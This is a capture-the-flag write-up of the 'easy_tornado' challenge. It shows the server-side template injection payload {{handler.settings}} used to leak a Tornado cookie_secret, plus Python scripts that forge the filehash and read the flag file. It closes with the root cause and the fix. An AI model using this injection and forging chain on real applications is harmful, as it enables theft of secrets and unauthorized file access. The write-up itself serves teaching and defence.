Vulnerability reproduction: easy_tornado
2022-07-07 08:10:00 【_s1mple】
[Environment]
Windows
[Tools]
Firefox
[Steps]
Tornado is one of the Python web application frameworks, and it ships its own template engine.
Opening the challenge shows three files, each served as /file?filename=<name>&filehash=<hash>:
flag.txt
/flag.txt
flag in /fllllllllllllag
So the flag is in the file /fllllllllllllag.
welcome.txt
/welcome.txt
render
render is Tornado's template-rendering function: it renders variables into a template, so different pages are produced by passing different parameters. This is the hint that user-controlled input reaches a template.
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))
The server checks filehash=md5(cookie_secret+md5(filename)) before returning a file. With filename=/fllllllllllllag the only unknown is cookie_secret; knowing it is enough to read the flag.
Further testing turns up an error page of the form /error?msg=Error. The msg value is reflected into the page, so server-side template injection (SSTI) is suspected.
Trying /error?msg={{datetime}} confirms it: in a Tornado template, datetime refers to the Python datetime module. Tornado exposes a number of such object aliases to templates for quick access; see the Tornado official documentation.
Looking through the documentation, cookie_secret is a key in the settings of the Application object, and self.application.settings has an alias:
RequestHandler.settings
An alias for self.application.settings.
handler is the RequestHandler object processing the current request, and RequestHandler.settings points to self.application.settings, so handler.settings inside the template yields the Application's settings dictionary, cookie_secret included.
Build the payload to obtain cookie_secret:
/error?msg={{handler.settings}}
The rendered error page dumps the application settings, among them:
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
Compute the filehash value (Python 3; hashlib works on bytes, so the string must be encoded first):
import hashlib


def md5(s):
    # hashlib.md5 takes bytes, hence the encode(); returns lowercase hex
    return hashlib.md5(s.encode()).hexdigest()


def filehash():
    filename = '/fllllllllllllag'
    # value leaked from the target's handler.settings; it differs per instance
    cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
    print(md5(cookie_secret + md5(filename)))


if __name__ == '__main__':
    filehash()
Final payload, where filehash is the 32-character hex digest printed above, i.e. md5(cookie_secret+md5(/fllllllllllllag)):
/file?filename=/fllllllllllllag&filehash=<computed filehash>
The response contains the flag.
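The chain above, done end to end offline, as an added example that is not part of the original write-up. It assumes the behaviour the write-up describes (the /error page reflects {{handler.settings}}, /file checks md5(cookie_secret+md5(filename))); the settings dump is constructed sample data, and the function names are this example's own. It goes slightly beyond the text: it parses the secret out of a full settings dump (which also contains non-literal reprs such as function objects) and handles the case where the dump was copied from raw HTML, since Tornado templates HTML-escape output by default.

```python
"""Added example: easy_tornado exploit chain, offline.
Assumed: /error?msg={{handler.settings}} leaks the settings dict and
/file?filename=...&filehash=... checks md5(cookie_secret+md5(filename)).
"""
import ast
import hashlib
import html
import re
from urllib.parse import urlencode

# Constructed stand-in for what /error?msg={{handler.settings}} renders.
# A real dump mixes literals with reprs like <function ...>, so the whole
# dict cannot be ast.literal_eval'd; only the cookie_secret literal is parsed.
SAMPLE_SETTINGS_DUMP = (
    "{'autoreload': True, "
    "'log_function': <function log_request at 0x7f0c0d2e9e50>, "
    "'cookie_secret': \"s3cr3t'with'quotes\", "
    "'debug': False}"
)

# Matches the cookie_secret key followed by ONE Python string literal,
# single- or double-quoted, with backslash escapes allowed inside.
_SECRET_RE = re.compile(
    r"""['"]cookie_secret['"]\s*:\s*"""
    r"""('(?:\\.|[^'\\])*'|"(?:\\.|[^"\\])*")"""
)


def md5_hex(s: str) -> str:
    """MD5 as lowercase hex, the way hints.txt writes md5()."""
    return hashlib.md5(s.encode()).hexdigest()


def extract_cookie_secret(settings_dump: str, raw_html: bool = False) -> str:
    """Pull cookie_secret out of a rendered handler.settings dump.

    raw_html=True decodes HTML entities first, for a dump copied from the
    page source rather than from the browser's rendered text (Tornado's
    default autoescape turns quotes and angle brackets into entities).
    """
    if raw_html:
        settings_dump = html.unescape(settings_dump)
    m = _SECRET_RE.search(settings_dump)
    if m is None:
        raise ValueError("no cookie_secret in settings dump")
    # literal_eval decodes the Python string literal (quote style, escapes)
    return ast.literal_eval(m.group(1))


def filehash(cookie_secret: str, filename: str) -> str:
    """filehash = md5(cookie_secret + md5(filename)), per hints.txt."""
    return md5_hex(cookie_secret + md5_hex(filename))


def build_file_url(cookie_secret: str, filename: str, base: str = "/file") -> str:
    """URL for the file endpoint that passes the filehash check for filename."""
    query = urlencode({"filename": filename,
                       "filehash": filehash(cookie_secret, filename)})
    return f"{base}?{query}"


def exploit(settings_dump: str, filename: str = "/fllllllllllllag",
            raw_html: bool = False) -> str:
    """Full chain: leaked settings dump -> cookie_secret -> forged /file URL."""
    secret = extract_cookie_secret(settings_dump, raw_html=raw_html)
    return build_file_url(secret, filename)


if __name__ == "__main__":
    print("cookie_secret:", extract_cookie_secret(SAMPLE_SETTINGS_DUMP))
    print("GET", exploit(SAMPLE_SETTINGS_DUMP))
```

The regex deliberately grabs only the one string literal after the cookie_secret key and hands it to ast.literal_eval, so a secret containing quotes or backslashes is decoded exactly as Python printed it. The root cause on the server side is that msg is used as the template source instead of being passed to a fixed template as a variable; the fix is the latter, which turns {{handler.settings}} back into literal text.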